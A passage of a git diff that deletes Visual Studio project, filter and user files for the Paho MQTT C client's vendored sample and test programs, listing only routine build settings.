-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\samples\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\Debug</AdditionalLibraryDirectories>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)\</AdditionalLibraryDirectories>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)\</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_sub.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <ItemGroup>
-    <ProjectReference Include="..\paho-mqtt3cs\paho-mqtt3cs.vcxproj">
-      <Project>{17f07f98-aa5f-4373-9877-992a341d650a}</Project>
-    </ProjectReference>
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.filters
deleted file mode 100644
index 1cfc2b2..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_sub.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsub/stdoutsub.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj
deleted file mode 100644
index 767166f..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj
+++ /dev/null
@@ -1,170 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{AF322561-C692-43D3-8502-CC1E6CD2869A}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>paho-cs-pub</RootNamespace>
-    <ProjectName>paho-cs-pub</ProjectName>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-    <PlatformToolset>v141</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\samples\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\Debug</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalDependencies>paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_pub.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.filters
deleted file mode 100644
index 69fd52a..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\samples\paho_cs_pub.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.user b/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.user
deleted file mode 100644
index ace9a86..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/stdoutsuba/stdoutsuba.vcxproj.user
+++ /dev/null
@@ -1,3 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj
deleted file mode 100755
index 85f83a0..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test1/test1.vcxproj
+++ /dev/null
@@ -1,173 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{4E643090-289D-487D-BCA8-685EA2210480}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\Debug\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

